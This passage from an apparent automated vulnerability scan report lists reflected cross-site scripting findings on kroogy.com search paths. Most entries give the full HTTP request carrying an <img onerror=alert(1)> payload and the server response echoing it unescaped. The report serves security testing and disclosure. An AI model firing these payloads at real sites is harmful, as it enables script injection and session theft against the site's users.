User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search7b56e<img src=a onerror=alert(1)>023dea34fefController</strong>
...[SNIP]...

6.192. http://kroogy.com/search/noresults [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/noresults

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673 was submitted in the REST URL parameter 2. This input was echoed as bf205<img src=a onerror=alert(1)>b24b05ec673 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/noresultsbf205<img%20src%3da%20onerror%3dalert(1)>b24b05ec673?search=site:xss.cx&type=news HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web?search=site%3Axss.cx&type=web&fl=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.4.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2123

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>noresultsbf205<img src=a onerror=alert(1)>b24b05ec673</strong>
...[SNIP]...

6.193. http://kroogy.com/search/random.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5 was submitted in the REST URL parameter 1. This input was echoed as 898ad<img src=a onerror=alert(1)>372477569b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search898ad<img%20src%3da%20onerror%3dalert(1)>372477569b5/random.php HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:40:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search898ad<img src=a onerror=alert(1)>372477569b5Controller</strong>
...[SNIP]...

6.194. http://kroogy.com/search/random.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/random.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 was submitted in the REST URL parameter 2. This input was echoed as be755<img src=a onerror=alert(1)>f0101f7e97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/random.phpbe755<img%20src%3da%20onerror%3dalert(1)>f0101f7e97 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/emailafriend?url=http%3A%2F%2Fkroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.6.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2123

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>random.phpbe755<img src=a onerror=alert(1)>f0101f7e97</strong>
...[SNIP]...

6.195. http://kroogy.com/search/redir [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/redir

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87 was submitted in the REST URL parameter 1. This input was echoed as 47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /search47c60<img%20src%3da%20onerror%3dalert(1)>af2c51e84c03eaa87/redir?type=web&search=site%3axss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
Origin: http://kroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2135

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search47c60<img src=a onerror=alert(1)>af2c51e84c03eaa87Controller</strong>
...[SNIP]...

6.196. http://kroogy.com/search/redir [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/redir

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef was submitted in the REST URL parameter 2. This input was echoed as 24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /search/redir24b8a<img%20src%3da%20onerror%3dalert(1)>a30ab8d9c04aed8ef?type=web&search=site%3axss.cx HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
Origin: http://kroogy.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2125

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>redir24b8a<img src=a onerror=alert(1)>a30ab8d9c04aed8ef</strong>
...[SNIP]...

6.197. http://kroogy.com/search/special [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/special

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c was submitted in the REST URL parameter 1. This input was echoed as 34153<img src=a onerror=alert(1)>b5d3aca645c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search34153<img%20src%3da%20onerror%3dalert(1)>b5d3aca645c/special?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Search34153<img src=a onerror=alert(1)>b5d3aca645cController</strong>
...[SNIP]...

6.198. http://kroogy.com/search/special [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/special

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427 was submitted in the REST URL parameter 2. This input was echoed as ae757<img src=a onerror=alert(1)>d4b0d95427 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/specialae757<img%20src%3da%20onerror%3dalert(1)>d4b0d95427?search=site%3Axss.cx&type=sports&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.5.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:44:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>specialae757<img src=a onerror=alert(1)>d4b0d95427</strong>
...[SNIP]...

6.199. http://kroogy.com/search/videos [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/videos

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1 was submitted in the REST URL parameter 1. This input was echoed as bf3e5<img src=a onerror=alert(1)>e2f2d6523e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchbf3e5<img%20src%3da%20onerror%3dalert(1)>e2f2d6523e1/videos?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchbf3e5<img src=a onerror=alert(1)>e2f2d6523e1Controller</strong>
...[SNIP]...

6.200. http://kroogy.com/search/videos [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/videos

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549 was submitted in the REST URL parameter 2. This input was echoed as 9b764<img src=a onerror=alert(1)>cca99ab0549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/videos9b764<img%20src%3da%20onerror%3dalert(1)>cca99ab0549?search=site%3Axss.cx&type=videos&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/noresults?search=site:xss.cx&type=news
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.10.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:46:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2120

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>videos9b764<img src=a onerror=alert(1)>cca99ab0549</strong>
...[SNIP]...

6.201. http://kroogy.com/search/web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299 was submitted in the REST URL parameter 1. This input was echoed as aae05<img src=a onerror=alert(1)>78d7029f299 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchaae05<img%20src%3da%20onerror%3dalert(1)>78d7029f299/web?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:39:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchaae05<img src=a onerror=alert(1)>78d7029f299Controller</strong>
...[SNIP]...

6.202. http://kroogy.com/search/web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f was submitted in the REST URL parameter 2. This input was echoed as 15d5b<img src=a onerror=alert(1)>f149c7a1f7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web15d5b<img%20src%3da%20onerror%3dalert(1)>f149c7a1f7f?search=site%3Axss.cx&type=web&fl=0 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:39:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web15d5b<img src=a onerror=alert(1)>f149c7a1f7f</strong>
...[SNIP]...

6.203. http://kroogy.com/search/web/N [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/N

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b775d<img%20src%3da%20onerror%3dalert(1)>000d69d6685 was submitted in the REST URL parameter 1. This input was echoed as b775d<img src=a onerror=alert(1)>000d69d6685 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /searchb775d<img%20src%3da%20onerror%3dalert(1)>000d69d6685/web/N HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.1.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:29:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2129

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Searchb775d<img src=a onerror=alert(1)>000d69d6685Controller</strong>
...[SNIP]...

6.204. http://kroogy.com/search/web/N [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/N

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6a014<img%20src%3da%20onerror%3dalert(1)>fbf61a98918 was submitted in the REST URL parameter 2. This input was echoed as 6a014<img src=a onerror=alert(1)>fbf61a98918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web6a014<img%20src%3da%20onerror%3dalert(1)>fbf61a98918/N HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&type=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.1.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:29:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2117

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>web6a014<img src=a onerror=alert(1)>fbf61a98918</strong>
...[SNIP]...

6.205. http://kroogy.com/search/web/index.php [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/web/index.php

Issue detail

The value of the page request parameter is copied into the HTML document as plain text between tags. The payload f5010<img%20src%3da%20onerror%3dalert(1)>245c1d7e61a was submitted in the page parameter. This input was echoed as f5010<img src=a onerror=alert(1)>245c1d7e61a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /search/web/index.php?page=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3Ef5010<img%20src%3da%20onerror%3dalert(1)>245c1d7e61a&type=3 HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
